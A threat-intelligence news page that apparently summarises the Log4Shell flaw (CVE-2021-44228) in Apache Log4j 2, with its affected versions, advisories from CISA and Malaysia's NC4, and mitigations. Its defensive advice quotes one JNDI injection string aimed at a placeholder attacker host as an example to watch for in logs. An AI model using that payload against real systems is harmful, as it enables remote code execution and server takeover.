A critical vulnerability in Apache Log4j 2, tracked as CVE-2021-44228, allows unauthenticated remote code execution through abuse of the library’s JNDI functionality. Affected versions include 2.0-beta9 through 2.14.1, where attacker-controlled input in log messages, configuration, or parameters can trigger lookups to malicious LDAP and related endpoints, potentially leading to full server compromise, data exposure, malware deployment, and service disruption. CISA described the flaw as a severe, widespread risk because Log4j is embedded across countless enterprise applications and services.
Apache and government cybersecurity authorities urged organizations to rapidly identify all direct and transitive uses of Log4j, upgrade to 2.15.0 or later, and apply mitigations where immediate patching is not possible. Recommended defensive steps included disabling message lookups, removing the JndiLookup class, monitoring logs for exploit strings such as ${jndi:ldap://attacker.com/a}, hardening internet-exposed systems, and isolating affected hosts while resetting credentials on any servers suspected of compromise.

Mallory correlates global threat intelligence with your attack surface — know if you’re exposed before adversaries strike.
3 events from the most recent confirmed update back to the earliest known activity.
Malaysia's NC4 issued an alert warning that CVE-2021-44228 could lead to complete server takeover, information leakage, malware infection, and service disruption. The advisory recommended upgrading to Log4j 2.15.0 or applying mitigations such as disabling message lookups or removing the JndiLookup class.
CISA published a statement from Director Jen Easterly addressing the Log4j vulnerability and emphasizing its seriousness. The statement marked an official U.S. government response to the emerging risk posed by widespread exploitation potential.
A critical Apache Log4j 2 vulnerability, CVE-2021-44228, was publicly disclosed. The flaw affects Log4j 2 versions 2.0-beta9 through 2.14.1 and can enable unauthenticated remote code execution via JNDI lookups.
Vulnerabilities, threat actors, malware, products, organizations, and breaches Mallory has linked to this story.
5 references tracked. Mallory keeps watching after this page renders.
nacsa.gov.my
Open sourcecisa.gov
Open sourcelogging.apache.org
Open sourcelogging.apache.org
Open sourcecve.mitre.org
Open sourceMap indicators from this story to your assets and identify affected systems in minutes.
Every observed campaign, victim, and pivot linked to actors named in this story.
Malware, exploits, and IOCs connected to the activity described here.
YARA, Sigma, and Snort rules deployed to your SIEM as soon as they’re published.
Get matching new stories delivered to your team as they break — not the next morning.
Ask questions about this story and take action on the answers.